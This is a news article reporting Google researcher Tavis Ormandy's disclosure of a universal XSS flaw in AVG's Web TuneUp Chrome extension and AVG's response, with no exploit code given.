AVG's Web TuneUp Chrome add-on poses security risk

The vulnerability overrides security features in the Chrome browser built to stop personal data being distributed

Google has uncovered a vulnerability in AVG's Web TuneUP software, which was specifically built to safeguard users against hidden threats.

The flaw was uncovered by the search engine's Tavis Ormandy, who works on Google's security team. He explained that the software force installs a plugin in the Chrome browser without asking for the user's permission.

Advertisement - Article continues below

In doing so, the software could expose the user's personal details and internet history to criminals trawling the web for such details. The code could also let hackers spy on victims' emails and other online activities, he said.

"This extension adds numerous JavaScript API's to chrome, apparently so that they can hijack search settings and the new tab page," Ormandy wrote in the bug report.

"The installation process is quite complicated so that they can bypass the chrome malware checks, which specifically tries to stop abuse of the extension API.

He added: "Anyway, many of the API's are broken, the attached exploit steals cookies from avg.com. It also exposes browsing history and other personal data to the internet, I wouldn't be surprised if it's possible to turn this into arbitrary code execution."

After discovering the problem, Ormandy wrote a letter to AVG, highlighting the issue and advising the company to fix the problem immediately.

Advertisement
Advertisement - Article continues below
Advertisement - Article continues below

"My concern is that your security software is disabling web security for nine million Chrome users, apparently so that you can hijack search settings and the new tab page," he wrote.

"There are multiple obvious attacks possible, for example, here is a trivial universal xss in the 'navigate' API that can allow any website to execute script in the context of any other domain. For example, attacker.com can read email from mail.google.com, or corp.avg.com, or whatever else. I hope the severity of this issue is clear to you, fixing it should be your highest priority."

AVG responded to the concerns, thanking Google for discovering the flaw and then claiming it had fixed the issue, although Google then responded, saying it hadn't prevented the addition from auto-installing as a Chrome extension.

Featured Resources

The case for a marketing content hub

Transform your digital marketing to deliver customer expectations

Download now

Fast, flexible and compliant e-signatures for global businesses

Be at the forefront of digital transformation with electronic signatures

Download now

Why CEOS should care about the move to SAP S/4HANA

And how they can accelerate business value

Download now

IT faces new security challenges in the wake of COVID-19

Beat the crisis by learning how to secure your network

Download now
Advertisement

Recommended

Visit/mobile/mobile-security/355889/parachute-introduces-superlock-feature
mobile security

Parachute's Superlock feature keeps your phone recording in an emergency

2 Jun 2020
Visit/mobile/google-android/355837/arizona-files-lawsuit-against-google-for-illegally-tracking-android
Google Android

Arizona files lawsuit against Google for illegally tracking Android users’ locations

29 May 2020
Visit/security/encryption/355820/k2view-innovates-in-data-management-with-new-encryption-patent
encryption

K2View innovates in data management with new encryption patent

28 May 2020
Visit/network-internet/email-providers/355822/gmail-introduces-new-features-to-makes-personalizing-your
email providers

Gmail introduces new features to makes personalizing your inbox easier

28 May 2020

Most Popular

Visit/operating-systems/ios/355935/apple-confirms-serious-bugs-in-ios-135
iOS

Apple confirms serious bugs in iOS 13.5

4 Jun 2020
Visit/mobile/5g/355911/the-uk-pivots-to-japan-for-5g-equipment
5G

The UK looks to Japan and South Korea for 5G equipment

4 Jun 2020
Visit/security/ransomware/355945/new-ransomware-uses-java-to-target-software-organisations
ransomware

Tycoon ransomware discovered using Java image files to target software firms

5 Jun 2020